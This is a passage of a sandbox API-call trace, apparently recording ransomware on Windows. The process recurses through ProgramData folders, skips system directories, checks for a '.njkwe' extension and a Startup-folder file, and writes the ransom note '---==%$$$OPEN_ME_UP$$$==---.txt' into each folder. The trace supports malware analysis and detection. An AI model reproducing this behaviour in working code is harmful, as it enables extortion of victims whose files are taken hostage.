(lpString1="VortexSchemaRequests.dat", lpString2="taridd") returned 1 [0073.481] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\VortexSchemaRequests.dat", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\VortexSchemaRequests.dat" (normalized: "c:\\programdata\\microsoft\\diagnosis\\vortexschemarequests.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.482] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x774ff760, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb85cc8d2, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb85cc8d2, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="VortexSchemaRequests.dat", cAlternateFileName="VORTEX~1.DAT")) returned 0 [0073.482] FindClose (in: hFindFile=0xc1a160 | out: hFindFile=0xc1a160) returned 1 [0073.482] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 70 [0073.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.482] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.483] CloseHandle (hObject=0x42c) returned 1 [0073.483] GetProcessHeap () returned 0xbe0000 [0073.483] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.483] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71bd25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DRM", cAlternateFileName="")) returned 1 [0073.483] lstrcmpiW (lpString1="DRM", lpString2="Windows") returned -1 [0073.483] lstrcmpiW (lpString1="DRM", lpString2="$Recycle.bin") returned 1 [0073.483] lstrcmpiW (lpString1="DRM", lpString2="System Volume Information") returned -1 [0073.483] lstrcmpiW (lpString1="DRM", lpString2="Program Files") returned -1 [0073.483] lstrcmpiW (lpString1="DRM", lpString2="Program Files (x86)") returned -1 [0073.483] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned 32 [0073.483] lstrcmpW (lpString1="DRM", lpString2=".") returned 1 [0073.483] lstrcmpW (lpString1="DRM", lpString2="..") returned 1 [0073.483] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.483] GetProcessHeap () returned 0xbe0000 [0073.483] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.484] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*") returned 34 [0073.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71bd25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d20 [0073.484] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.484] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.484] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.484] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.484] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.484] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\.") returned 34 [0073.484] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.484] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71bd25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.484] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.484] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.484] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.484] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.484] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.484] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\..") returned 35 [0073.484] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.484] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71c393, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Server", cAlternateFileName="")) returned 1 [0073.484] lstrcmpiW (lpString1="Server", lpString2="Windows") returned -1 [0073.484] lstrcmpiW (lpString1="Server", lpString2="$Recycle.bin") returned 1 [0073.484] lstrcmpiW (lpString1="Server", lpString2="System Volume Information") returned -1 [0073.484] lstrcmpiW (lpString1="Server", lpString2="Program Files") returned 1 [0073.484] lstrcmpiW (lpString1="Server", lpString2="Program Files (x86)") returned 1 [0073.484] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned 39 [0073.484] lstrcmpW (lpString1="Server", lpString2=".") returned 1 [0073.484] lstrcmpW (lpString1="Server", lpString2="..") returned 1 [0073.484] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.484] GetProcessHeap () returned 0xbe0000 [0073.484] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.485] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*") returned 41 [0073.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71c393, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a160 [0073.485] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.485] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.485] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.485] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.485] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.485] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.") returned 41 [0073.485] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.485] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.486] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.486] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.486] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\." (normalized: "c:\\programdata\\microsoft\\drm\\server\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.486] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71c393, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.486] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.486] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\..") returned 42 [0073.486] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.486] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.486] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.486] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.486] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\.." (normalized: "c:\\programdata\\microsoft\\drm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.486] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71c393, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.486] FindClose (in: hFindFile=0xc1a160 | out: hFindFile=0xc1a160) returned 1 [0073.486] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 71 [0073.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\drm\\server\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.487] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.487] CloseHandle (hObject=0x430) returned 1 [0073.488] GetProcessHeap () returned 0xbe0000 [0073.488] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.488] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd71c393, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Server", cAlternateFileName="")) returned 0 [0073.488] FindClose (in: hFindFile=0xc19d20 | out: hFindFile=0xc19d20) returned 1 [0073.488] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 64 [0073.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\drm\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.488] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.489] CloseHandle (hObject=0x42c) returned 1 [0073.489] GetProcessHeap () returned 0xbe0000 [0073.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.489] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x40368daa, ftLastAccessTime.dwHighDateTime=0x1d39f5f, ftLastWriteTime.dwLowDateTime=0x40368daa, ftLastWriteTime.dwHighDateTime=0x1d39f5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0073.489] lstrcmpiW (lpString1="Event Viewer", lpString2="Windows") returned -1 [0073.489] lstrcmpiW (lpString1="Event Viewer", lpString2="$Recycle.bin") returned 1 [0073.489] lstrcmpiW (lpString1="Event Viewer", lpString2="System Volume Information") returned -1 [0073.489] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files") returned -1 [0073.489] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files (x86)") returned -1 [0073.490] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer") returned 41 [0073.490] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0073.490] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0073.490] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.490] GetProcessHeap () returned 0xbe0000 [0073.490] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.490] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*") returned 43 [0073.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x40368daa, ftLastAccessTime.dwHighDateTime=0x1d39f5f, ftLastWriteTime.dwLowDateTime=0xfbfe5ab1, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0073.490] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.490] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.491] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.491] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.491] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.491] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\.") returned 43 [0073.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.491] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x40368daa, ftLastAccessTime.dwHighDateTime=0x1d39f5f, ftLastWriteTime.dwLowDateTime=0xfbfe5ab1, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.491] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.491] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.491] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.491] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.491] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.491] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\..") returned 44 [0073.491] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.491] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Views", cAlternateFileName="")) returned 1 [0073.491] lstrcmpiW (lpString1="Views", lpString2="Windows") returned -1 [0073.491] lstrcmpiW (lpString1="Views", lpString2="$Recycle.bin") returned 1 [0073.491] lstrcmpiW (lpString1="Views", lpString2="System Volume Information") returned 1 [0073.491] lstrcmpiW (lpString1="Views", lpString2="Program Files") returned 1 [0073.491] lstrcmpiW (lpString1="Views", lpString2="Program Files (x86)") returned 1 [0073.491] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views") returned 47 [0073.491] lstrcmpW (lpString1="Views", lpString2=".") returned 1 [0073.491] lstrcmpW (lpString1="Views", lpString2="..") returned 1 [0073.491] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.491] GetProcessHeap () returned 0xbe0000 [0073.491] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.491] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*") returned 49 [0073.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0073.491] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.491] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.492] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.492] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.492] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.492] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\.") returned 49 [0073.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.492] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.492] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.492] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.492] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.492] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.492] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.492] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\..") returned 50 [0073.492] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.492] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.492] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ApplicationViewsRootNode", cAlternateFileName="APPLIC~1")) returned 1 [0073.492] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Windows") returned -1 [0073.492] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="$Recycle.bin") returned 1 [0073.492] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="System Volume Information") returned -1 [0073.492] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files") returned -1 [0073.492] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files (x86)") returned -1 [0073.492] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 72 [0073.492] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2=".") returned 1 [0073.492] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2="..") returned 1 [0073.492] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.492] GetProcessHeap () returned 0xbe0000 [0073.492] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.492] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*") returned 74 [0073.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93dc4da, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0e0 [0073.493] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.493] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.493] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.493] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.493] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.493] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: 